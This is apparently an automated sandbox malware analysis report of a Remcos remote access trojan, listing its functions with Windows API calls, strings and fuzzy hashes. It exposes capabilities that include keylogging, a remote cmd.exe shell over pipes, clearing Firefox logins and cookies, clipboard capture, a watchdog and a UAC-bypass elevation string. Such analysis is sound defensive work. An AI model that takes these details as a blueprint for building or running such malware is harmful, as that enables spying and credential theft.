                                                                        Function 29139E1F Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _wcslen
                                                                        • String ID:
                                                                        • API String ID: 176396367-0
                                                                        • Opcode ID: 5ba988ecaaf0601099ff7d4843746d1594aca23db71213ab37f1d2183b03357c
                                                                        • Instruction ID: af97a94d7f0960eb2c48bf83ec19b78115a7dceb3510c1dc991d71c901dbf30f
                                                                        • Opcode Fuzzy Hash: 5ba988ecaaf0601099ff7d4843746d1594aca23db71213ab37f1d2183b03357c
                                                                        • Instruction Fuzzy Hash: 0311BB31904248AFDB45DF26DC509EF77F9AF74214B90902DE80253294EF34AF16CB94
                                                                        Function 2913489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WSAStartup.WS2_32(00000202,00000000), ref: 291348B3
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Startup
                                                                        • String ID:
                                                                        • API String ID: 724789610-0
                                                                        • Opcode ID: cae01116dd0a42f83e3dd13382dee625817c707f89f3074ab48df8d7f1709981
                                                                        • Instruction ID: 568fb992f29eed380ebdf8bafcd5ce241fcb6d91e9609f67b375a035517d3bd9
                                                                        • Opcode Fuzzy Hash: cae01116dd0a42f83e3dd13382dee625817c707f89f3074ab48df8d7f1709981
                                                                        • Instruction Fuzzy Hash: B2D0223365824C4EE620B9B5AC0F8A4771CC306611F000BAA6CB183AC6E6041B1CC2A3
                                                                        Function 29156D59 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: send
                                                                        • String ID:
                                                                        • API String ID: 2809346765-0
                                                                        • Opcode ID: 54f069a2729d2ba8448d539ef566664b0b48a64da194b9a47cf55ea5e4031607
                                                                        • Instruction ID: 6f48491f7eed92824bbf27587f3f7d5341e2e00131adabf7eb64f471bfcfe522
                                                                        • Opcode Fuzzy Hash: 54f069a2729d2ba8448d539ef566664b0b48a64da194b9a47cf55ea5e4031607
                                                                        • Instruction Fuzzy Hash: 30B09B75104245FF96051761C804C5E7D75B7C8380F014D0C718641130C53584505721

                                                                        Non-executed Functions

                                                                        Function 29137CD2 Relevance: 34.1, APIs: 10, Strings: 9, Instructions: 835filesleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetEvent.KERNEL32(?,?), ref: 29137CF4
                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 29137DC2
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 29137DE4
                                                                          • Part of subcall function 2914C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C37D
                                                                          • Part of subcall function 2914C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C3AD
                                                                          • Part of subcall function 2914C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C402
                                                                          • Part of subcall function 2914C322: FindClose.KERNEL32(00000000,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C463
                                                                          • Part of subcall function 2914C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C46A
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                          • Part of subcall function 29134AA1: WaitForSingleObject.KERNEL32(?,00000000,2913547D,?,?,00000004,?,?,00000004,?,291A4EF8,?), ref: 29134B47
                                                                          • Part of subcall function 29134AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,291A4EF8,?,?,?,?,?,?,2913547D), ref: 29134B75
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 291381D2
                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 291382B3
                                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 291384FF
                                                                        • DeleteFileA.KERNEL32(?), ref: 2913868D
                                                                          • Part of subcall function 29138847: __EH_prolog.LIBCMT ref: 2913884C
                                                                          • Part of subcall function 29138847: FindFirstFileW.KERNEL32(00000000,?,29196618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29138905
                                                                          • Part of subcall function 29138847: __CxxThrowException@8.LIBVCRUNTIME ref: 2913892D
                                                                          • Part of subcall function 29138847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 2913893A
                                                                        • Sleep.KERNEL32(000007D0), ref: 29138733
                                                                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 29138775
                                                                          • Part of subcall function 2914CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 2914CB68
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                        • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                        • API String ID: 1067849700-1507758755
                                                                        • Opcode ID: 3a6bb3374aeebc9350010c82bac2868d07df0cfb9caaf137653ec49f540be6b8
                                                                        • Instruction ID: e84956a34b3cc2eaccd1171f7aabfb46db723152da006af1d8074059012112e5
                                                                        • Opcode Fuzzy Hash: 3a6bb3374aeebc9350010c82bac2868d07df0cfb9caaf137653ec49f540be6b8
                                                                        • Instruction Fuzzy Hash: C342B331A143407BD788FB77CC559AE76B96FB1248FC0AD2CE04257194EE249B0BC79A
                                                                        Function 2913569A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __Init_thread_footer.LIBCMT ref: 291356E6
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        • __Init_thread_footer.LIBCMT ref: 29135723
                                                                        • CreatePipe.KERNEL32(291A6CCC,291A6CB4,291A6BD8,00000000,291960CC,00000000), ref: 291357B6
                                                                        • CreatePipe.KERNEL32(291A6CB8,291A6CD4,291A6BD8,00000000), ref: 291357CC
                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,291A6BE8,291A6CBC), ref: 2913583F
                                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 29135897
                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 291358BC
                                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 291358E9
                                                                          • Part of subcall function 29164801: __onexit.LIBCMT ref: 29164807
                                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,291A4F90,291960D0,00000062,291960B4), ref: 291359E4
                                                                        • Sleep.KERNEL32(00000064,00000062,291960B4), ref: 291359FE
                                                                        • TerminateProcess.KERNEL32(00000000), ref: 29135A17
                                                                        • CloseHandle.KERNEL32 ref: 29135A23
                                                                        • CloseHandle.KERNEL32 ref: 29135A2B
                                                                        • CloseHandle.KERNEL32 ref: 29135A3D
                                                                        • CloseHandle.KERNEL32 ref: 29135A45
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                        • String ID: SystemDrive$cmd.exe
                                                                        • API String ID: 2994406822-3633465311
                                                                        • Opcode ID: fe32a422220c7f8f0498a77ea8adcf449fefbc31877cf547447cfffcfdc50c75
                                                                        • Instruction ID: 5abe2427ebc783a51e86e0cc7026c4f8c42037fb931784b49c10b544d807d9cd
                                                                        • Opcode Fuzzy Hash: fe32a422220c7f8f0498a77ea8adcf449fefbc31877cf547447cfffcfdc50c75
                                                                        • Instruction Fuzzy Hash: A0910A71704288BFD748BF37DC8091A3B79EB6068CB805419F4199629DDE3A9F0BC765
                                                                        Function 29142132 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32 ref: 29142141
                                                                          • Part of subcall function 291438B2: RegCreateKeyA.ADVAPI32(80000001,00000000,291960B4), ref: 291438C0
                                                                          • Part of subcall function 291438B2: RegSetValueExA.KERNEL32(291960B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,2913C18D,29196C58,00000001,000000AF,291960B4), ref: 291438DB
                                                                          • Part of subcall function 291438B2: RegCloseKey.ADVAPI32(291960B4,?,?,?,2913C18D,29196C58,00000001,000000AF,291960B4), ref: 291438E6
                                                                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 29142181
                                                                        • CloseHandle.KERNEL32(00000000), ref: 29142190
                                                                        • CreateThread.KERNEL32(00000000,00000000,29142829,00000000,00000000,00000000), ref: 291421E6
                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 29142455
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                        • API String ID: 3018269243-13974260
                                                                        • Opcode ID: 7e99520b2658a08672d6be1cb83fdfa4dc32d26b0cbe1e0b0f51666ee471f73a
                                                                        • Instruction ID: fb3e481767398c9f678766d9da742ee0818dbe7888844b58b9002dba841fdc2f
                                                                        • Opcode Fuzzy Hash: 7e99520b2658a08672d6be1cb83fdfa4dc32d26b0cbe1e0b0f51666ee471f73a
                                                                        • Instruction Fuzzy Hash: A371D631A1424077E258F773DC55CAEB7B8AFB520CFC0A92DE44652094EF24AB0BC696
                                                                        Function 2913BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 2913BBEA
                                                                        • FindClose.KERNEL32(00000000), ref: 2913BC04
                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 2913BD27
                                                                        • FindClose.KERNEL32(00000000), ref: 2913BD4D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$CloseFile$FirstNext
                                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                        • API String ID: 1164774033-3681987949
                                                                        • Opcode ID: 07f0d8fcba3d6c51da3c50f18f4f73b4ad83dd0ae1b1c421260645f3e5a0d98f
                                                                        • Instruction ID: 9ecbea369d83152acb7c6c1e5cbd1670c33d228b285a1f2db7b719fefb1ad27e
                                                                        • Opcode Fuzzy Hash: 07f0d8fcba3d6c51da3c50f18f4f73b4ad83dd0ae1b1c421260645f3e5a0d98f
                                                                        • Instruction Fuzzy Hash: 76517331D10049ABEB48FBB3DC58DEDB738AF20248FD09559E506660A4FF346B4BCA59
                                                                        Function 2913BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 2913BDEA
                                                                        • FindClose.KERNEL32(00000000), ref: 2913BE04
                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 2913BEC4
                                                                        • FindClose.KERNEL32(00000000), ref: 2913BEEA
                                                                        • FindClose.KERNEL32(00000000), ref: 2913BF0B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Close$File$FirstNext
                                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                        • API String ID: 3527384056-432212279
                                                                        • Opcode ID: 7afe6482fc09dacc7a1404a9f5d16accd06b66b7c69e6aa2c9810d53359fb1cc
                                                                        • Instruction ID: 1f3bf61e27be1823ce885b0fc8394735a47f8e65f38b8db915ab682e6c6d6a63
                                                                        • Opcode Fuzzy Hash: 7afe6482fc09dacc7a1404a9f5d16accd06b66b7c69e6aa2c9810d53359fb1cc
                                                                        • Instruction Fuzzy Hash: 5141B631D04119BAEB88F7B7DC59CED777CAF20258FC09119E50652094FF206B4BCAA5
                                                                        Function 291468FC Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenClipboard.USER32 ref: 291468FD
                                                                        • EmptyClipboard.USER32 ref: 2914690B
                                                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 2914692B
                                                                        • GlobalLock.KERNEL32(00000000), ref: 29146934
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 2914696A
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 29146973
                                                                        • CloseClipboard.USER32 ref: 29146990
                                                                        • OpenClipboard.USER32 ref: 29146997
                                                                        • GetClipboardData.USER32(0000000D), ref: 291469A7
                                                                        • GlobalLock.KERNEL32(00000000), ref: 291469B0
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 291469B9
                                                                        • CloseClipboard.USER32 ref: 291469BF
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                        • String ID:
                                                                        • API String ID: 3520204547-0
                                                                        • Opcode ID: 2bab923c9eb6cc7ef209c09bcac3b81349bc55c85273124854f977ab56342299
                                                                        • Instruction ID: a98a5c0407032378288b18b35e3997a43e8419b39cea8aed405bf78a62560872
                                                                        • Opcode Fuzzy Hash: 2bab923c9eb6cc7ef209c09bcac3b81349bc55c85273124854f977ab56342299
                                                                        • Instruction Fuzzy Hash: FB2171717042406FE754BBB3DC4CAAE77B8BFA4755F40581CE90782184EE384A069762
                                                                        Function 29149662 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 206COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$1$2$3$4$5$6$7
                                                                        • API String ID: 0-3177665633
                                                                        • Opcode ID: 4385d13386e6049ed1ccb4f940037de06280f89496179afb68bd5ef5f3174dec
                                                                        • Instruction ID: 70d04f82f6c7a7ffde7ac6108dbd6f6706e35e716ca782d889b78e476eda031a
                                                                        • Opcode Fuzzy Hash: 4385d13386e6049ed1ccb4f940037de06280f89496179afb68bd5ef5f3174dec
                                                                        • Instruction Fuzzy Hash: F771E770908301AFD704CF22DC51F9A7BE4AFA8B54F40A90DF59A571D0DA74AB0AC793
                                                                        Function 29137538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 2913755C
                                                                        • CoGetObject.OLE32(?,00000024,29196528,00000000), ref: 291375BD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Object_wcslen
                                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                        • API String ID: 240030777-3166923314
                                                                        • Opcode ID: 323a4dab028dd0410cd145bd1158239f55abe88033906c0d92155119edd851ee
                                                                        • Instruction ID: 7e0e51cff4a1b5f40e90fcab6ef13bb9467eb2d017b56927ba4a9c0ec06b7308
                                                                        • Opcode Fuzzy Hash: 323a4dab028dd0410cd145bd1158239f55abe88033906c0d92155119edd851ee
                                                                        • Instruction Fuzzy Hash: 8111867291115CBBE710DAA6CD88EDEB7BCAF14758F810055F508A2244DA349B068A75
                                                                        Function 2914A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,291A58E8), ref: 2914A7EF
                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 2914A83E
                                                                        • GetLastError.KERNEL32 ref: 2914A84C
                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 2914A884
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                        • String ID:
                                                                        • API String ID: 3587775597-0
                                                                        • Opcode ID: f6ff3758876c47198e2b9be6942116826a1a5ae3d7f844e18121c9949751836a
                                                                        • Instruction ID: 81ceefe5c4dce7ba81833a6619d1fb70e0d57c2fe1b30e187c02d448de746415
                                                                        • Opcode Fuzzy Hash: f6ff3758876c47198e2b9be6942116826a1a5ae3d7f844e18121c9949751836a
                                                                        • Instruction Fuzzy Hash: 5D815271508304ABE344DB62DC9499FB7BCBFA4348F90981DF58652190EF30EB0ACB96
                                                                        Function 2914AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,2914A517,00000000), ref: 2914ABAD
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,2914A517,00000000), ref: 2914ABC4
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A517,00000000), ref: 2914ABD1
                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,2914A517,00000000), ref: 2914ABE0
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A517,00000000), ref: 2914ABF1
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A517,00000000), ref: 2914ABF4
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                        • String ID:
                                                                        • API String ID: 221034970-0
                                                                        • Opcode ID: b2afb5d893718d9cc5df171b6ccbc2d75dc01c47347c0ef20f71c21025fde7e5
                                                                        • Instruction ID: 07e6cc12dcd1368cbac291e2fd815d2d5e329dba32ab572bbbcd549859a210dd
                                                                        • Opcode Fuzzy Hash: b2afb5d893718d9cc5df171b6ccbc2d75dc01c47347c0ef20f71c21025fde7e5
                                                                        • Instruction Fuzzy Hash: F011C272E5011C7BE311AB66DC89CFF3B7CEB463A5B400016F90692080DB284A46BAA1
                                                                        Function 2913C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 2913C3D6
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 2913C4A9
                                                                        • FindClose.KERNEL32(00000000), ref: 2913C4B8
                                                                        • FindClose.KERNEL32(00000000), ref: 2913C4E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$CloseFile$FirstNext
                                                                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                        • API String ID: 1164774033-405221262
                                                                        • Opcode ID: 95335fa02aed8cf2c83bb72866ddb20bacf45d9ccdd6b4aa338c3ad9b872ca0d
                                                                        • Instruction ID: e5a73fb0e2fa447930d5502f3f977bda59ff5611c3abfad3c9fe0e9ea01b797d
                                                                        • Opcode Fuzzy Hash: 95335fa02aed8cf2c83bb72866ddb20bacf45d9ccdd6b4aa338c3ad9b872ca0d
                                                                        • Instruction Fuzzy Hash: E0319531914159BAEB19E773DC98DFD777CBF20258FC05019E406A2094EF34AB8BCA58
                                                                        Function 2914C322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C37D
                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C3AD
                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C41F
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C42C
                                                                          • Part of subcall function 2914C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C402
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C44D
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C463
                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C46A
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C473
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                        • String ID:
                                                                        • API String ID: 2341273852-0
                                                                        • Opcode ID: be865b415b530bfda480b921ec5b4576ce09b84f23eb8af66f6e77b52ec7857c
                                                                        • Instruction ID: 10f980844af30fc28a12bbed419b69648288ac2740918986b3b9d110186e28da
                                                                        • Opcode Fuzzy Hash: be865b415b530bfda480b921ec5b4576ce09b84f23eb8af66f6e77b52ec7857c
                                                                        • Instruction Fuzzy Hash: 4831E572D0121CAAEB54D772DD4CEEA73BCAF08308F4415F6E545D2054EB3997C6CAA0
                                                                        Function 2913A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 2913A30E
                                                                        • SetWindowsHookExA.USER32(0000000D,2913A2DF,00000000), ref: 2913A31C
                                                                        • GetLastError.KERNEL32 ref: 2913A328
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 2913A376
                                                                        • TranslateMessage.USER32(?), ref: 2913A385
                                                                        • DispatchMessageA.USER32(?), ref: 2913A390
                                                                        Strings
                                                                        • Keylogger initialization failure: error , xrefs: 2913A33C
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                        • String ID: Keylogger initialization failure: error
                                                                        • API String ID: 3219506041-952744263
                                                                        • Opcode ID: c03c4bdb6af098f3cc277c97ea61e574543e181d6bbb341b6ff0f779f5bb2930
                                                                        • Instruction ID: a1595528efa67f73fc47de032a06cb5a116f1194020e8d66e0a7bc24cb2034d5
                                                                        • Opcode Fuzzy Hash: c03c4bdb6af098f3cc277c97ea61e574543e181d6bbb341b6ff0f779f5bb2930
                                                                        • Instruction Fuzzy Hash: 5311C131B10284ABD7047A77DC4D85B77FCFB96718B90452DF882D2184EA308706C7A5
                                                                        Function 2913A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 2913A451
                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 2913A45D
                                                                        • GetKeyboardLayout.USER32(00000000), ref: 2913A464
                                                                        • GetKeyState.USER32(00000010), ref: 2913A46E
                                                                        • GetKeyboardState.USER32(?,?,00000000), ref: 2913A479
                                                                        • ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 2913A49C
                                                                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 2913A4FC
                                                                        • ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 2913A535
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                        • String ID:
                                                                        • API String ID: 1888522110-0
                                                                        • Opcode ID: 2db3666144d4807bd35c951c36265458ad6c2b8d06d63c87b11df7c370380534
                                                                        • Instruction ID: 8b19216af05a40929ec8b79e02ec00f66422f7c7606ccf54e3b3db2e25edba88
                                                                        • Opcode Fuzzy Hash: 2db3666144d4807bd35c951c36265458ad6c2b8d06d63c87b11df7c370380534
